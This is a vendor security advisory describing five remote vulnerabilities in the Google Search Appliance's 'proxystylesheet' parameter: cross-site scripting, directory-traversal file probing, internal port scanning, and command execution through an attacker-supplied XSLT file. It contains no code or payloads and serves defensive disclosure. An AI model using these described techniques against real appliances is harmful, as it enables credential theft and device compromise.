• Product Information
• Security Products Overview
• Juniper Networks ISG Series
• IDP Demo
• Product Poster & Z-Card 

Title: Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities

Severity: HIGH

Description:

Google Search Appliances are commercial search devices produced by Google.

The Google Search Appliance 'proxystylesheet' feature is susceptible to multiple remote vulnerabilities. These issues are due to a failure of the devices to securely implement user-specified XSLT style sheets when displaying search results.

Google Search Appliances use an HTML request variable called 'proxystylesheet' to determine the location of an XSLT (Extensible Stylesheet Language Transformation) file. These files are used to alter the resulting display of search requests. Several issues when handling this form variable have been identified.

The first issue is a cross-site scripting vulnerability. The contents of the 'proxystylesheet' request variable is displayed back to users, allowing attackers to create URIs that include malicious script code. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.

The second issue is an information-disclosure vulnerability. By specifying as the argument to 'proxystylesheet' arbitrary filenames that include '../' directory-traversal sequences, attackers may determine the existence of arbitrary files on the targeted computer. This may aid them in further attacks.

The third issue is also an information-disclosure vulnerability. By specifying remote URIs that include port specifications, attackers may then use the affected device as a port scanner to scan networks accessible to the affected device, because the device returns different data to the user depending on the status of the remote TCP port. This may aid attackers in further attacks.

The fourth issue is a cross-site scripting vulnerability. Malicious users may specify the URI of an attacker-controlled XSLT style sheet containing malicious script code that will be executed by the targeted user's browser. An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

The fifth issue is an arbitrary command-execution vulnerability. Malicious users may specify the URI of an attacker-controlled XSLT style sheet containing malicious commands that will be executed as an unprivileged user on the affected appliance. This allows attackers to compromise the affected device.

The Google Mini Search Appliance is confirmed vulnerable to these issues. The Google Search Appliance may also be affected.

Affected Products:

• Google Mini Search Appliance
• Google Search Appliance

References:

• Google: Enterprise Solutions : Google Search Appliance

Juniper Networks provides this content via a wide variety of sources and production methods. If notified of errors or omissions in the content of this page, Juniper Networks, at its discretion, will modify or remove the page or leave the content as is, depending on various factors including but not limited to the reputation and authority of the party providing the notification. Please use the contact information displayed elsewhere on this page to report any errors or omissions regarding the content on this page.